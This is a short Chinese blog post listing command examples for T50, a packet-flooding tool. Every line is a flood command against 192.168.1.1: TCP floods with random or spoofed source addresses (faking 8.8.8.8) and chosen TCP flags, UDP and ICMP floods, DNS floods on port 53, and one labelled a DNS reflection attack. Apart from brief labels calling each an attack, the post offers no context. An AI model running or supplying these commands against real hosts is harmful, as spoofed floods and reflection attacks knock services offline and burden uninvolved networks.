site: https://sourceforge.net/projects/t50/

例子:
t50 192.168.1.1 –flood
–protocol T50|TCP|UDP|ICMP
–threshold 500
–flood
t50 –flood –protocol TCP 192.168.1.1
t50 –flood –protocol UDP 192.168.1.1
t50 –flood –protocol ICMP 192.168.1.1
t50 –flood –protocol UDP –dport 53 192.168.1.1
t50 –flood –protocol UDP –dport 53 192.168.1.1

# 随机源IP,随机TCP flag攻击
$ t50 –flood –protocol TCP 192.168.1.1

# 固定源IP,随机TCP flag攻击
$ t50 –flood –protocol TCP –saddr 8.8.8.8 192.168.1.1

# 固定源IP,固定TCP flag攻击
$ t50 –flood –protocol TCP –fin –saddr 8.8.8.8 192.168.1.1
$ t50 –flood –protocol TCP –syn –saddr 8.8.8.8 192.168.1.1
$ t50 –flood –protocol TCP –rst –saddr 8.8.8.8 192.168.1.1
$ t50 –flood –protocol TCP –psh –saddr 8.8.8.8 192.168.1.1
$ t50 –flood –protocol TCP –ack –saddr 8.8.8.8 192.168.1.1

# 随机源IP,UDP攻击
$ t50 –flood –protocol UDP 192.168.1.1

# 固定源IP,DNS攻击
$ t50 –flood –protocol UDP –dport 53 192.168.1.1

# 随机源IP,DNS反射攻击
$ t50 –flood –protocol UDP –sport 53 192.168.1.1

# 随机源IP,ICMP攻击
$ t50 –flood –protocol ICMP 192.168.1.1

# 固定源IP,ICMP攻击
$ t50 –flood –protocol ICMP –saddr 8.8.8.8 192.168.1.1

版权声明:本文为mlsec原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/mlsec/p/8594580.html